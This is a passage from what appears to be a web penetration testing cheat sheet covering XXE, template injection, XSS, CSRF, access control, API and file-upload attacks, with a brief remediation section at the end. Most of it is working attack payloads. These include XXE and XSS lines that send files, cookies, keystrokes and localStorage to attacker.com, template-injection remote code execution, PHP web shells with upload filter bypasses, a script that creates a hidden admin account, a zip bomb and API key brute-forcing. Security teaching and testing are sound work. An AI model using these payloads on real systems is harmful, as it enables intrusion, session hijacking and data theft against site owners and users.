Advanced XXE payloads:

<!-- Read internal files -->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

<!-- SSRF via XXE -->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal-server/admin">]>

<!-- Out-of-band XXE (if no direct output) -->
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
  %send;
]>

<!-- evil.dtd on attacker server: -->
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>">
%all;

<!-- PHP wrapper for base64 encoding -->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">]>

<!-- Read Windows files -->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>

Server-Side Template Injection (SSTI)

Detection:

# Test for template injection
# Jinja2/Flask:
{{7*7}}  # Should output 49 if vulnerable

# Twig:
{{7*'7'}}  # Should output 7777777 if vulnerable

# FreeMarker:
${7*7}  # Should output 49 if vulnerable

Exploitation payloads:

# Jinja2 (Flask) RCE:
{{ config.items() }}  # Enumerate config

{{ ''.__class__.__mro__[1].__subclasses__() }}  # List all classes

# Execute commands:
{{ ''.__class__.__mro__[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate() }}

# Simpler payload:
{{ request.application.__globals__.__builtins__.__import__('os').popen('id').read() }}

// FreeMarker RCE:
<#assign ex="freemarker.template.utility.Execute"?new()>
${ex("cat /etc/passwd")}

// Thymeleaf:
${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}

---

Cross-Site Scripting (XSS)

Reflected XSS

Detection:

# Basic test
curl "http://target.com/search?q=<script>alert(1)</script>"

# Check if payload appears in response
curl -s "http://target.com/search?q=UNIQUE12345" | grep "UNIQUE12345"
# If found = potential XSS if not properly encoded

Common payloads:

<!-- Basic alert -->
<script>alert('XSS')</script>

<!-- Image tag -->
<img src=x onerror=alert('XSS')>

<!-- SVG -->
<svg onload=alert('XSS')>

<!-- Body tag -->
<body onload=alert('XSS')>

<!-- Input tag -->
<input onfocus=alert('XSS') autofocus>

<!-- Markdown XSS -->
[Click me](javascript:alert('XSS'))

<!-- Event handlers -->
<div onmouseover="alert('XSS')">Hover me</div>

<!-- Data URI -->
<a href="data:text/html,<script>alert('XSS')</script>">Click</a>

Advanced XSS payloads:

<!-- Bypass filters -->
<script>alert(String.fromCharCode(88,83,83))</script>  <!-- alert('XSS') -->

<img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;">  <!-- HTML entity encoding -->

<img src=x onerror="\u0061\u006c\u0065\u0072\u0074('XSS')">  <!-- Unicode escape -->

<!-- Without quotes -->
<script>alert(document.domain)</script>

<!-- Without parentheses (ES6) -->
<script>onerror=alert;throw 1</script>

<!-- Bypass uppercase filter -->
<ScRiPt>alert('XSS')</sCrIpT>

<!-- Polyglot payload (works in multiple contexts) -->
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

XSS for cookie stealing:

<script>
fetch('http://attacker.com/steal?cookie=' + document.cookie);
</script>

<!-- Alternative: -->
<img src=x onerror="this.src='http://attacker.com/steal?c='+document.cookie">

<!-- Using XMLHttpRequest: -->
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/steal?cookie=' + btoa(document.cookie), true);
xhr.send();
</script>

Stored XSS

Testing methodology:

# 1. Submit payload via POST request
curl -X POST http://target.com/comments \
    -d "comment=<script>alert('Stored XSS')</script>"

# 2. Visit page where comment is displayed
curl http://target.com/comments/123

# 3. Check if script executes

High-impact stored XSS payloads:

<!-- BeEF (Browser Exploitation Framework) hook -->
<script src="http://attacker.com:3000/hook.js"></script>

<!-- Session hijacking -->
<script>
new Image().src='http://attacker.com/steal.php?cookie='+document.cookie;
</script>

<!-- Keylogger -->
<script>
document.onkeypress = function(e) {
    fetch('http://attacker.com/log?key=' + String.fromCharCode(e.which));
}
</script>

<!-- Defacement -->
<script>
document.body.innerHTML = '<h1>Hacked by Attacker</h1>';
</script>

<!-- Admin account creation -->
<script>
fetch('/admin/create-user', {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({username: 'hacker', password: 'password123', role: 'admin'})
});
</script>

DOM-based XSS

Detection:

# Check for DOM sinks in JavaScript
curl -s http://target.com/app.js | grep -E "innerHTML|outerHTML|document.write|eval"

# Test URL fragment
http://target.com/page#<img src=x onerror=alert('DOM XSS')>

Common DOM sinks:

// Vulnerable code examples:

// innerHTML
document.getElementById('output').innerHTML = location.hash.substring(1);
// Exploit: http://target.com/page#<img src=x onerror=alert(1)>

// eval
eval(location.hash.substring(1));
// Exploit: http://target.com/page#alert(1)

// document.write
document.write(decodeURIComponent(location.search.substring(1)));
// Exploit: http://target.com/page?<script>alert(1)</script>

// setTimeout/setInterval
setTimeout(location.hash.substring(1), 1000);
// Exploit: http://target.com/page#alert(1)

// jQuery html()
$('#output').html(location.hash.substring(1));
// Exploit: http://target.com/page#<img src=x onerror=alert(1)>

XSS Bypass Techniques

<!-- Bypass tag blacklist -->
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<details open ontoggle=alert(1)>

<!-- Bypass keyword blacklist (alert, script) -->
<img src=x onerror=confirm(1)>
<img src=x onerror=prompt(1)>
<img src=x onerror=self['ale'+'rt'](1)>
<img src=x onerror=top['ale'+'rt'](1)>
<img src=x onerror=eval('ale'+'rt(1)')>

<!-- Bypass parentheses filter -->
<script>onerror=alert;throw 1</script>
<script>import('data:text/javascript,alert(1)')</script>

<!-- Bypass without space -->
<img/src=x/onerror=alert(1)>
<svg/onload=alert(1)>

<!-- Case variation -->
<ScRiPt>alert(1)</ScRiPt>
<IMG SRC=x ONERROR=alert(1)>

<!-- Null bytes -->
<scri%00pt>alert(1)</scri%00pt>

<!-- HTML encoding -->
&#60;script&#62;alert(1)&#60;/script&#62;

<!-- URL encoding -->
%3Cscript%3Ealert(1)%3C/script%3E

XSS Automation

# Dalfox (fast XSS scanner)
dalfox url http://target.com/search?q=test

# XSStrike
python3 xsstrike.py -u "http://target.com/search?q=test"

# Nuclei with XSS templates
nuclei -u http://target.com -t ~/nuclei-templates/cves/ -t ~/nuclei-templates/vulnerabilities/xss/

# Burp Suite Scanner (Professional)
# 1. Send request to Scanner
# 2. Right-click → Scan → XSS

---

Cross-Site Request Forgery (CSRF)

CSRF Detection

Check for CSRF protection:

# 1. Inspect form for CSRF token
curl -s http://target.com/settings | grep -i "csrf"

# Secure example:
# <input type="hidden" name="csrf_token" value="a1b2c3d4e5f6...">

# 2. Test without token
curl -X POST http://target.com/settings \
    -b "session=xyz" \
    -d "email=attacker@evil.com"

# Expected (secure): 403 Forbidden or "Invalid CSRF token"
# Vulnerable: 200 OK (email changed)

# 3. Test with invalid token
curl -X POST http://target.com/settings \
    -b "session=xyz" \
    -d "email=attacker@evil.com&csrf_token=invalid"

# Should reject request

CSRF Exploitation

Basic CSRF POC (Proof of Concept):

<!-- csrf_poc.html -->
<!DOCTYPE html>
<html>
<head><title>CSRF POC</title></head>
<body>
  <h1>Click anywhere to continue</h1>
  <form id="csrf-form" action="http://target.com/settings" method="POST">
    <input type="hidden" name="email" value="attacker@evil.com">
    <input type="hidden" name="password" value="hacked123">
  </form>
  <script>
    document.getElementById('csrf-form').submit();
  </script>
</body>
</html>

Advanced CSRF techniques:

<!-- Auto-submit with XMLHttpRequest (bypasses referrer check if misconfigured) -->
<script>
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://target.com/settings', true);
xhr.withCredentials = true;  // Send cookies
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send('email=attacker@evil.com');
</script>

<!-- Using fetch API -->
<script>
fetch('http://target.com/settings', {
    method: 'POST',
    credentials: 'include',  // Send cookies
    headers: {'Content-Type': 'application/x-www-form-urlencoded'},
    body: 'email=attacker@evil.com'
});
</script>

<!-- Image-based CSRF (GET request) -->
<img src="http://target.com/delete-account?confirm=yes">

<!-- JSON CSRF -->
<script>
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://target.com/api/transfer', true);
xhr.withCredentials = true;
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify({to: 'attacker', amount: 10000}));
</script>

CSRF Protection Bypass

Bypass weak CSRF token validation:

# 1. Token not tied to user session
# User A's token: csrf_abc123
# User B's token: csrf_xyz789

# User A can use User B's token successfully (vulnerable)

# 2. Token validation only when token is present
curl -X POST http://target.com/settings \
    -b "session=xyz" \
    -d "email=attacker@evil.com"
# No csrf_token parameter = bypassed

# 3. Referer header check bypass
# Use <meta name="referrer" content="no-referrer"> to suppress referer

# 4. Method bypass (POST → GET)
# If application accepts both methods:
<img src="http://target.com/delete-account?confirm=yes&csrf_token=stolen">

---

Access Control & Authorization

Insecure Direct Object Reference (IDOR)

Testing methodology:

# 1. Sequential ID enumeration
curl http://target.com/api/invoice/1001 -H "Authorization: Bearer USER_A_TOKEN"
curl http://target.com/api/invoice/1002 -H "Authorization: Bearer USER_A_TOKEN"  # Try to access user B's invoice

# 2. Parameter pollution
curl "http://target.com/api/user/123?user_id=124"  # Try to override user_id

# 3. Body parameter modification
curl -X POST http://target.com/api/order \
    -H "Authorization: Bearer USER_A_TOKEN" \
    -d '{"order_id": 999, "user_id": 124}'  # Try to modify another user's order

# 4. UUID/GUID enumeration
curl http://target.com/api/document/f47ac10b-58cc-4372-a567-0e02b2c3d479
# Even if IDs are UUIDs, test if authorization is enforced

Burp Suite - Autorize extension for IDOR:

1. Install Autorize extension
2. Set low-privilege user's session token
3. Browse application as high-privilege user
4. Review Autorize tab for unauthorized access

Horizontal Privilege Escalation

User A accessing User B's resources:

# Profile viewing
curl http://target.com/profile/userB -H "Cookie: session=userA_session"
# Expected: 403 Forbidden
# Vulnerable: 200 OK with userB's profile

# Message reading
curl http://target.com/messages/456 -H "Cookie: session=userA_session"
# Message 456 belongs to userB

# Order manipulation
curl -X POST http://target.com/api/cancel-order \
    -H "Cookie: session=userA_session" \
    -d "order_id=789"  # Order 789 belongs to userB

Vertical Privilege Escalation

Standard user accessing admin functions:

# Admin panel access
curl http://target.com/admin -H "Cookie: session=standard_user"

# Admin API endpoints
curl http://target.com/api/admin/users -H "Cookie: session=standard_user"

# Parameter-based role escalation
curl -X POST http://target.com/api/user/update \
    -H "Cookie: session=standard_user" \
    -d '{"user_id": 123, "role": "admin"}'

# Hidden admin functions
curl -X POST http://target.com/api/create-admin-user \
    -H "Cookie: session=standard_user" \
    -d '{"username": "hacker", "password": "pass123"}'

Mass Assignment Vulnerability

Concept: Application blindly binds all user input to object properties.

# Normal user registration:
POST /api/register HTTP/1.1
Content-Type: application/json

{
    "username": "newuser",
    "email": "user@example.com",
    "password": "password123"
}

# Mass assignment attack (add admin field):
{
    "username": "hacker",
    "email": "hacker@evil.com",
    "password": "password123",
    "is_admin": true,
    "role": "administrator",
    "verified": true,
    "credits": 999999
}

# If vulnerable, user is created with admin privileges

Testing approach:

# 1. Identify object properties by viewing API responses
curl http://target.com/api/user/123
# Response shows: {"id":123,"username":"test","is_admin":false,"credits":100}

# 2. Try to modify restricted properties
curl -X POST http://target.com/api/user/update \
    -d '{"username":"test","is_admin":true,"credits":999999}'

# 3. Check if changes persisted
curl http://target.com/api/user/123

---

API Security Testing

REST API Enumeration

# Common API endpoints
/api/v1/users
/api/v1/auth/login
/api/v1/auth/register
/api/v2/products
/api/admin/config
/api/docs
/api/swagger
/api/graphql

# API documentation paths
/swagger.json
/swagger.yaml
/openapi.json
/api/swagger-ui.html
/api-docs
/docs
/redoc

# Download API documentation
curl http://target.com/swagger.json | jq . > api_spec.json

# Kiterunner (API endpoint discovery)
kr scan target.com -w ~/api-wordlist.txt

API Authentication Testing

JWT testing:

# See JWT section above for detailed testing

# Quick checks:
# 1. Decode JWT
echo "eyJhbGc..." | cut -d'.' -f2 | base64 -d | jq .

# 2. Test without signature
# Remove signature portion and test

# 3. Test expired token
# Wait for token expiration and reuse

API key testing:

# API key in URL (insecure)
curl "http://target.com/api/data?api_key=abc123"

# API key in header (better)
curl http://target.com/api/data -H "X-API-Key: abc123"

# Test weak API key
for key in {000000..999999}; do
    curl -s http://target.com/api/data -H "X-API-Key: $key" | grep -q "error" || echo "Valid key: $key"
done

# Test API key reuse
# User A's key: abc123
# Try using User A's key to access User B's data
curl http://target.com/api/user/userB/data -H "X-API-Key: abc123"

GraphQL Testing

Introspection query:

curl -X POST http://target.com/graphql \
    -H "Content-Type: application/json" \
    -d '{"query":"{\n  __schema {\n    types {\n      name\n      fields {\n        name\n      }\n    }\n  }\n}"}'

# Visualize schema with GraphQL Voyager:
# https://graphql-kit.com/graphql-voyager/

Common GraphQL attacks:

# Introspection (if enabled)
{
  __schema {
    queryType {
      fields {
        name
        description
      }
    }
  }
}

# IDOR in GraphQL
{
  user(id: 124) {
    email
    password_hash
    credit_card
  }
}

# Batch queries (DoS)
{
  user1: user(id: 1) { name }
  user2: user(id: 2) { name }
  user3: user(id: 3) { name }
  ...
  user10000: user(id: 10000) { name }
}

# Nested queries (DoS)
{
  users {
    posts {
      comments {
        author {
          posts {
            comments {
              author {
                name
              }
            }
          }
        }
      }
    }
  }
}

API Rate Limiting Testing

# Test for rate limiting
for i in {1..1000}; do
    curl -s http://target.com/api/search?q=test &
done

# Expected: 429 Too Many Requests after ~100 requests
# Vulnerable: All 1000 requests succeed

# Check response headers
curl -I http://target.com/api/search?q=test

# Rate limit headers (good):
# X-RateLimit-Limit: 100
# X-RateLimit-Remaining: 99
# X-RateLimit-Reset: 1634567890

API Versioning Issues

# Test older API versions
curl http://target.com/api/v1/users  # Older version, may have vulnerabilities
curl http://target.com/api/v2/users  # Newer version, may have fixes

# Check for version-specific bypasses
# v2 requires authentication, v1 doesn't:
curl http://target.com/api/v1/admin/users  # May bypass auth

---

File Upload Vulnerabilities

Unrestricted File Upload

Testing methodology:

# 1. Upload legitimate file
curl -F "file=@test.jpg" http://target.com/upload

# 2. Upload PHP shell
curl -F "file=@shell.php" http://target.com/upload

# 3. Access uploaded file
curl http://target.com/uploads/shell.php?cmd=whoami

Basic PHP web shell:

<?php
// shell.php
system($_GET['cmd']);
?>

<!-- Usage: -->
<!-- http://target.com/uploads/shell.php?cmd=ls -->

More sophisticated shell:

<?php
// shell2.php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>

<form method="POST">
    Command: <input type="text" name="cmd">
    <input type="submit" value="Execute">
</form>

Bypass File Extension Filters

# 1. Null byte injection (older PHP)
curl -F "file=@shell.php%00.jpg" http://target.com/upload

# 2. Double extension
curl -F "file=@shell.php.jpg" http://target.com/upload

# 3. Case variation
curl -F "file=@shell.PhP" http://target.com/upload
curl -F "file=@shell.pHp" http://target.com/upload

# 4. Alternative extensions
shell.php5
shell.phtml
shell.phar
shell.asp
shell.aspx
shell.jsp
shell.jspx

# 5. Add valid extension at end
curl -F "file=@shell.php.png" http://target.com/upload
# Then rename or use path traversal

Bypass Content-Type Validation

# Change Content-Type header
curl -F "file=@shell.php;type=image/jpeg" http://target.com/upload

# Burp Suite:
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpeg  <!-- Fake content type -->

<?php system($_GET['cmd']); ?>
------WebKitFormBoundary--

Magic Byte (File Signature) Bypass

# Add JPEG magic bytes to PHP shell
echo -e '\xFF\xD8\xFF\xE0\n<?php system($_GET["cmd"]); ?>' > shell.php.jpg

# Add PNG magic bytes
echo -e '\x89PNG\r\n\x1a\n\n<?php system($_GET["cmd"]); ?>' > shell.php.png

# Add GIF magic bytes
echo -e 'GIF89a\n<?php system($_GET["cmd"]); ?>' > shell.php.gif

Path Traversal in File Upload

# Upload file to arbitrary location
curl -F "file=@shell.php" -F "path=../../../../../../var/www/html/" http://target.com/upload

# Filename with path traversal
curl -F "file=@shell.php;filename=../../../shell.php" http://target.com/upload

# Windows path traversal
curl -F "file=@shell.php;filename=..\..\..\..\inetpub\wwwroot\shell.php" http://target.com/upload

XXE via File Upload

<!-- malicious.svg -->
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

# Upload malicious SVG
curl -F "file=@malicious.svg" http://target.com/upload

# Access uploaded file
curl http://target.com/uploads/malicious.svg
# Should display /etc/passwd content

ZIP File Upload Vulnerabilities

Zip Slip (path traversal):

# Create malicious zip with path traversal
echo '<?php system($_GET["cmd"]); ?>' > shell.php
zip malicious.zip shell.php
# Modify zip to include path traversal in filename:
# Use zip tool to add ../../../../var/www/html/shell.php

ZIP bomb (DoS):

# Create zip bomb
dd if=/dev/zero bs=1M count=10240 | gzip > 10GB.gz
# 10MB compressed, 10GB uncompressed

# Upload to cause DoS when extracted
curl -F "file=@10GB.gz" http://target.com/upload

---

Business Logic Testing

Price Manipulation

# Negative quantity
curl -X POST http://target.com/cart/add \
    -d "product_id=123&quantity=-1&price=99.99"

# Negative price
curl -X POST http://target.com/checkout \
    -d "items[0][id]=123&items[0][quantity]=1&items[0][price]=-99.99"

# Currency mismatch
curl -X POST http://target.com/checkout \
    -d "amount=1&currency=USD"
# Then change currency to IDR (1 USD = 15,000 IDR)
curl -X POST http://target.com/process-payment \
    -d "amount=1&currency=IDR"

# Decimal truncation
curl -X POST http://target.com/cart/add \
    -d "product_id=123&price=0.001"
# If stored as integer: 0.001 → 0

Race Conditions

Testing race conditions:

# Scenario: Redeem coupon code (single-use)

# 1. Create multiple requests in parallel
for i in {1..10}; do
    curl -X POST http://target.com/redeem \
        -H "Cookie: session=user_session" \
        -d "coupon=SAVE50" &
done

# Expected: Only 1 successful redemption
# Vulnerable: Multiple successful redemptions

# Turbo Intruder (Burp Suite extension)
# 1. Send request to Turbo Intruder
# 2. Set concurrency to 50-100
# 3. Send simultaneous requests

Real-world race condition examples:

# Double spending (crypto/payment)
# Send 2 simultaneous withdrawal requests before balance check

# Duplicate voucher usage
# Redeem same code multiple times in parallel

# Inventory overflow
# Purchase item with quantity=999999 before stock validation

Workflow Bypass

# Normal checkout flow:
# 1. Add to cart → 2. Shipping info → 3. Payment → 4. Confirmation

# Bypass payment step:
# Skip directly from step 2 to step 4
curl -X POST http://target.com/checkout/confirm \
    -H "Cookie: session=user_session" \
    -d "order_id=12345"

# Multi-step form bypass
# Step 1: /register/step1 (email)
# Step 2: /register/step2 (profile)
# Step 3: /register/step3 (verification)

# Skip to step 3 without completing step 2:
curl -X POST http://target.com/register/step3 \
    -d "email=test@example.com&verified=true"

Account Takeover via Logic Flaws

# Password reset token reuse
# 1. Request password reset for victim
# 2. Victim receives token
# 3. Attacker requests reset for same email
# 4. Attacker uses victim's old token (if not invalidated)

# OAuth redirect_uri manipulation
curl "http://target.com/oauth/authorize?client_id=123&redirect_uri=http://attacker.com&response_type=code"

# Email verification bypass
# Register with victim@example.com
# Change email to attacker@evil.com before verification
# Click verification link → attacker@evil.com is verified

---

Client-Side Security

Local Storage Security

// Check for sensitive data in localStorage
console.log(localStorage);

// Common sensitive data found:
// - JWT tokens
// - Session IDs
// - API keys
// - PII (personally identifiable information)

// Exploit:
// XSS → steal localStorage:
<script>
fetch('http://attacker.com/steal?data=' + btoa(JSON.stringify(localStorage)));
</script>

WebSocket Security

// Test WebSocket endpoint
var ws = new WebSocket('ws://target.com/chat');

ws.onopen = function() {
    // Send malicious message
    ws.send('{"type":"admin","command":"delete_all_users"}');
};

ws.onmessage = function(event) {
    console.log('Received:', event.data);
};

// Check for authentication
// Vulnerable: WebSocket accepts connections without auth token

// Check for message validation
// Send unexpected message types, XSS payloads, injection attempts

PostMessage Security

// Vulnerable postMessage listener:
window.addEventListener('message', function(event) {
    // No origin validation!
    document.getElementById('output').innerHTML = event.data;  // XSS!
});

// Exploit from attacker.com:
<iframe src="http://target.com/vulnerable-page"></iframe>
<script>
frames[0].postMessage('<img src=x onerror=alert(1)>', '*');
</script>

// Secure implementation:
window.addEventListener('message', function(event) {
    // Validate origin
    if (event.origin !== 'https://trusted-site.com') {
        return;
    }
    // Sanitize data
    document.getElementById('output').textContent = event.data;
});

CORS Misconfiguration

# Test for wildcard CORS
curl -H "Origin: http://attacker.com" \
     -H "Access-Control-Request-Method: POST" \
     -H "Access-Control-Request-Headers: X-Requested-With" \
     -X OPTIONS \
     http://target.com/api/data

# Vulnerable response:
# Access-Control-Allow-Origin: *
# Access-Control-Allow-Credentials: true

# Exploitation:
<script>
fetch('http://target.com/api/sensitive-data', {
    credentials: 'include'
})
.then(r => r.text())
.then(data => {
    fetch('http://attacker.com/steal?data=' + btoa(data));
});
</script>

# Test for origin reflection
curl -H "Origin: http://evil.com" http://target.com/api/data

# Vulnerable response:
# Access-Control-Allow-Origin: http://evil.com  (reflects any origin)

---

Server-Side Security

HTTP Security Headers

Check security headers:

curl -I http://target.com

# Essential security headers:
# ✅ Strict-Transport-Security: max-age=31536000; includeSubDomains
# ✅ X-Frame-Options: DENY
# ✅ X-Content-Type-Options: nosniff
# ✅ Content-Security-Policy: default-src 'self'
# ✅ X-XSS-Protection: 1; mode=block
# ✅ Referrer-Policy: no-referrer
# ✅ Permissions-Policy: geolocation=(), microphone=()

Missing header implications:

# Missing HSTS → SSL stripping attacks possible
# Missing X-Frame-Options → Clickjacking possible
# Missing CSP → XSS attacks easier
# Missing X-Content-Type-Options → MIME confusion attacks

Server Information Disclosure

# Server version disclosure
curl -I http://target.com | grep "Server:"
# Apache/2.4.29 (Ubuntu)  ← Discloses OS and version

# PHP version disclosure
curl -I http://target.com | grep "X-Powered-By:"
# X-Powered-By: PHP/7.2.24  ← Discloses PHP version

# Technology stack leakage
whatweb http://target.com

# Error message information disclosure
curl http://target.com/nonexistent.php
# Fatal error: require_once(): Failed opening required '/var/www/html/config.php'
# ← Discloses absolute path

HTTP Method Testing

# Test for dangerous HTTP methods
curl -X OPTIONS http://target.com -v

# Check Allow header:
# Allow: GET, POST, PUT, DELETE, OPTIONS, TRACE  ← TRACE is dangerous

# Test TRACE (XST - Cross-Site Tracing)
curl -X TRACE http://target.com -H "Cookie: session=secret"
# If TRACE is enabled, response includes cookie

# Test PUT (arbitrary file upload)
curl -X PUT http://target.com/shell.php -d '<?php system($_GET["cmd"]); ?>'

# Test DELETE
curl -X DELETE http://target.com/important-file.php

SSL/TLS Vulnerabilities

# testssl.sh comprehensive scan
testssl.sh --full https://target.com

# Check for specific vulnerabilities:
# - Heartbleed (CVE-2014-0160)
testssl.sh --heartbleed https://target.com

# - POODLE (CVE-2014-3566)
testssl.sh --poodle https://target.com

# - BEAST (CVE-2011-3389)
testssl.sh --beast https://target.com

# - CRIME (CVE-2012-4929)
testssl.sh --crime https://target.com

# - Weak ciphers
nmap --script ssl-enum-ciphers -p 443 target.com | grep -E "weak|broken"

---

Automated Scanning

Nuclei (Template-Based Scanner)

# Install Nuclei templates
nuclei -update-templates

# Full vulnerability scan
nuclei -u http://target.com

# Scan with specific severity
nuclei -u http://target.com -severity critical,high

# CVE scanning
nuclei -u http://target.com -t ~/nuclei-templates/cves/

# Technology-specific templates
nuclei -u http://target.com -t ~/nuclei-templates/technologies/wordpress/
nuclei -u http://target.com -t ~/nuclei-templates/technologies/joomla/

# XSS templates
nuclei -u http://target.com -t ~/nuclei-templates/vulnerabilities/xss/

# SQL injection templates
nuclei -u http://target.com -t ~/nuclei-templates/vulnerabilities/sqli/

# Subdomain scanning
subfinder -d target.com | nuclei -t ~/nuclei-templates/

Burp Suite Scanner (Professional)

# Automated scanning workflow:
# 1. Spider/Crawl the application
# 2. Passive scanner (analyzes traffic)
# 3. Active scanner (sends payloads)

# Launch scan:
# Target → Right-click → Scan

# Scan configuration:
# - Crawl and Audit
# - Audit only (if already crawled)
# - Custom scan (select specific checks)

OWASP ZAP (Zed Attack Proxy)

# Automated scan
zap.sh -cmd -quickurl http://target.com -quickout zap_report.html

# API scan
zap.sh -cmd -openapiurl http://target.com/swagger.json -quickout api_report.html

# Full scan with authentication
zap-cli quick-scan --self-contained --spider -r http://target.com

# ZAP as proxy (manual testing)
zap.sh -port 8090
# Configure browser to use 127.0.0.1:8090 as proxy

Nikto (Web Server Scanner)

# Basic scan
nikto -h http://target.com

# Scan with all plugins
nikto -h http://target.com -Plugins @@ALL

# Save results
nikto -h http://target.com -o nikto_report.html -Format html

# Scan through proxy
nikto -h http://target.com -useproxy http://127.0.0.1:8080

WPScan (WordPress Scanner)

# Basic WordPress scan
wpscan --url http://target.com

# Enumerate vulnerable plugins
wpscan --url http://target.com --enumerate vp

# Enumerate vulnerable themes
wpscan --url http://target.com --enumerate vt

# Enumerate users
wpscan --url http://target.com --enumerate u

# Password brute-force
wpscan --url http://target.com --usernames admin --passwords /usr/share/wordlists/rockyou.txt

# Full enumeration with API token
wpscan --url http://target.com --enumerate vp,vt,u --api-token YOUR_API_TOKEN

---

Reporting & Remediation

Vulnerability Report Structure

Executive Summary:

• Brief overview of engagement
• Critical findings summary
• Risk rating (Critical, High, Medium, Low)
• Remediation timeline recommendations

Methodology:

• Scope and limitations
• Testing approach (black-box, gray-box, white-box)
• Tools used
• Testing timeline

Findings:

For each vulnerability:

1. Title: SQL Injection in Login Form
2. Severity: Critical (CVSS 9.8)
3. Affected Component: /api/login endpoint, username parameter
4. Description: The login endpoint is vulnerable to SQL injection due to unsanitized user input being directly concatenated into SQL queries.
5. Proof of Concept:

   curl -X POST http://target.com/api/login \
       -d "username=admin' OR '1'='1&password=anything"

6. Impact:
   • Complete database compromise
   • Extraction of user credentials
   • Potential remote code execution
7. Remediation:
   • Use parameterized queries (prepared statements)
   • Implement input validation
   • Apply least privilege principle for database user
8. References:
   • OWASP Top 10 2021: A03 - Injection
   • CWE-89: SQL Injection

CVSS Scoring

Common Vulnerability Scoring System calculator:

https://www.first.org/cvss/calculator/3.1

Example scoring:

• SQL Injection: CVSS 9.8 (Critical)

  • Attack Vector: Network (AV:N)
  • Attack Complexity: Low (AC:L)
  • Privileges Required: None (PR:N)
  • User Interaction: None (UI:N)
  • Confidentiality: High (C:H)
  • Integrity: High (I:H)
  • Availability: High (A:H)

• Stored XSS: CVSS 7.1 (High)

  • Attack Vector: Network (AV:N)
  • Privileges Required: Low (PR:L)
  • User Interaction: Required (UI:R)
  • Confidentiality: High (C:H)

Remediation Recommendations

SQL Injection:

// Vulnerable code:
$query = "SELECT * FROM users WHERE username = '" . $_POST['username'] . "'";

// Secure code (parameterized query):
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = :username");
$stmt->execute(['username' => $_POST['username']]);

XSS:

// Vulnerable code:
echo "<div>" . $_GET['search'] . "</div>";

// Secure code (HTML encoding):
echo "<div>" . htmlspecialchars($_GET['search'], ENT_QUOTES, 'UTF-8') . "</div>";

CSRF:

// Generate CSRF token:
session_start();
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

// Include in form:
echo '<input type="hidden" name="csrf_token" value="' . $_SESSION['csrf_token'] . '">';

// Validate on submission:
if ($_POST['csrf_token'] !== $_SESSION['csrf_token']) {
    die('CSRF token validation failed');
}

---

Tools Reference

Essential Tools

Tool	Purpose	Installation
Burp Suite	HTTP proxy, scanner, intruder	sudo apt install burpsuite
OWASP ZAP	HTTP proxy, automated scanner	sudo apt install zaproxy
sqlmap	Automated SQL injection	sudo apt install sqlmap
Nmap	Port scanner, service detection	sudo apt install nmap
Nikto	Web server scanner	sudo apt install nikto
ffuf	Web fuzzer, directory brute-force	go install github.com/ffuf/ffuf@latest
Nuclei	Template-based vulnerability scanner	go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
subfinder	Subdomain enumeration	go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
httprobe	Check alive HTTP/HTTPS	go install github.com/tomnomnom/httprobe@latest
dalfox	XSS scanner	go install github.com/hahwul/dalfox/v2@latest

Specialized Tools

Tool	Purpose	Website
WPScan	WordPress scanner	https://wpscan.com/
Droopescan	Drupal/Joomla scanner	https://github.com/droope/droopescan
Retire.js	JavaScript library vulnerability scanner	https://retirejs.github.io/retire.js/
jwt_tool	JWT analysis and exploitation	https://github.com/ticarpi/jwt_tool
testssl.sh	SSL/TLS testing	https://testssl.sh/
Arjun	HTTP parameter discovery	https://github.com/s0md3v/Arjun
LinkFinder	Endpoint discovery in JavaScript	https://github.com/GerbenJavado/LinkFinder
XSStrike	Advanced XSS detection	https://github.com/s0md3v/XSStrike

Browser Extensions

Extension	Purpose	Browser
FoxyProxy	Proxy switching	Firefox, Chrome
Wappalyzer	Technology detection	Firefox, Chrome
Cookie-Editor	Cookie manipulation	Firefox, Chrome
User-Agent Switcher	UA spoofing	Firefox, Chrome
EditThisCookie	Cookie editing	Chrome

---

Legal & Ethical Considerations

Authorization Requirements

CRITICAL: Never test without explicit written authorization

Required documentation:

1. Scope of Work (SOW) - Defines testing boundaries
2. Rules of Engagement (ROE) - Specifies allowed/prohibited actions
